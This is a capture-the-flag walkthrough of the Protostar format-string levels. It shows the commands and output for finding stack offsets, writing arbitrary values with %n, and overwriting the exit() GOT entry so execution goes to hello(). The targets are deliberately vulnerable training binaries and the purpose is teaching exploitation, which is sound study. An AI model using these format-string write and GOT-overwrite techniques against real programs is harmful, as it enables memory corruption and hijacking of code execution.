Exploit Exercises — Protostar Format Levels

This is a protostar walkthrough describing format string exploitation.

This article is the only thing you need to complete these levels.

Format 0

$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)

When we use %64d , sprintf pops 64 bytes from the stack and then adds 0xdeadbeef and copies it into buffer causing overflow.

Format 1

Read this first to understand how different variables are stored. Then we look for target:

$ objdump -t format1 | grep target
08049638 g     O .bss   00000004              target

We see the needed variable is in uninitialized data segment called .bss and has the address 0x08049638.

Then I tried to print 146 bytes from the stack and tried to find where our buffer is stored:

$ ./format1 ABCD`python -c 'print "%x."*146'`

ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.

Can you see that 0x44434241 value in the end? Also you can use some bruteforce:

$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241

%4$x is what called “direct access”.

You can see ABCD above (don’t forget we are on little-endian machine). Now we know the offset and we can try to directly access this variable:

./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u

Now we know the offset in the stack in printf and we can rewrite the value using %n. Read more about using %n here. In a nutshell, using %n you must specify address of int variable where the size of written data will be written to.

So if you use something like <addr>%141%n it will pop addr from the stack and will write the number of written bytes there.

We know the address is 0x08049638 that in little-endian format is \x38\x96\x04\x08. Now we can simply replace ABCD with the address:

$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)

Format 2

Now we are supposed to rewrite the variable with a particular value 64.

Now let’s do a bit of bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(

Now we need to find the address of target variable:

$ objdump -t format2 | grep target
080496e4 g     O .bss   00000004              target

Let’s try to rewrite to rewrite the variable with uncertain value:

$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(

We write 4 bytes and it says about it. If we want to write more, we just need to increase the number of bytes written. In this case the program will get 64 bytes before %4$n and then it replaces %4$n with the number of bytes it has already written:

$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)

Format 3

We start this challenge with bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(

Now we need to find the memory address of target:

$ objdump -t format3 | grep target
080496f4 g     O .bss   00000004              target

So let’s try to rewrite target:

$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(

Awesome! It says we rewrote 4 bytes.

Then I tried to extend the string and look and the stack:

$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(

Now let’s try to directly take 12th and then look at values on the stack:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(

To be clearer let’s draw simple scheme of our stack:

junk              <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08  <- 12th value
BBBB              <- 13th value
CCCC              <- 15th value
DDDD              <- 16th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saver ret>

I understand that it could be confusing. Because here numbers don’t have nothing with how the stack grows. They are just argument numbers. If so try to read about direct access in this paper.

Now everything is clear: we need to replace BBBB, CCCC, DDDD with address + i to rewrite each byte and add needed offsets in order to write the right value.

Let’s try to rewrite the lowest byte first. It must be 0x44:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD                                                   0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(

Then I tried to rewrite the third bite:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0
target is 00004444 :(

Awesome, it works. I didn’t know it keeps the number of already written bytes. So it’s easier to write small values first. We need to get 0x01025544, but we certainly cannot get 0x01 and 0x02. However we can try to write 0x101 for example. We will write in this order: 0x44, 0x55, 0x101, 0x102 (or maybe 0x202).

0x55 is a third byte, so we need increase our address just by 1:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0       3221222592
target is 00005544 :(

Instead of writing 0x101 and 0x102 we can try to write 0x102 as two byte value:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD                                                   0       3221222592                                                                                                                                                                   3086843892
you have modified the target :)

Wow, we modified the target :)

Format 4

Now we need to redirect the flow. In order to do so we can just rewrite the return address.

As always we start with finding the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141

Now let’s find the address of hello() function:

$ objdump -t format4 | grep hello
080484b4 g     F .text  0000001e              hello

From this point I understood that we are not supposed to rewrite the return address and we need to change the relocation table.

Let’s look at relocations:

$ objdump -TR format4

format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata    00000004  Base        _IO_stdin_used
08049730 g    DO .bss   00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

Additionally to look at the relocation table you can use:

$ readelf -r format4

Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496fc  00000106 R_386_GLOB_DAT    00000000   __gmon_start__
08049730  00000905 R_386_COPY        08049730   stdin

Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804970c  00000107 R_386_JUMP_SLOT   00000000   __gmon_start__
08049710  00000207 R_386_JUMP_SLOT   00000000   fgets
08049714  00000307 R_386_JUMP_SLOT   00000000   __libc_start_main
08049718  00000407 R_386_JUMP_SLOT   00000000   _exit
0804971c  00000507 R_386_JUMP_SLOT   00000000   printf
08049720  00000607 R_386_JUMP_SLOT   00000000   puts
08049724  00000707 R_386_JUMP_SLOT   00000000   exit

Good articles about shared libraries and relocations:

I thought it’s a good idea to try to rewrite exit() function by the address of hello() function. Thus we need to rewrite value at the address0x08049724 by 0x080484b4.

Now let’s use a test exploit:

$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt

$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()

Awesome. We rewrote the first two bytes and jumped to 0x000084b4. Let’s do the same with other two bytes. Do not forget to correct the offsets (-4 to the first one because we added new 4 bytes address).

Now run the exploit:

$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win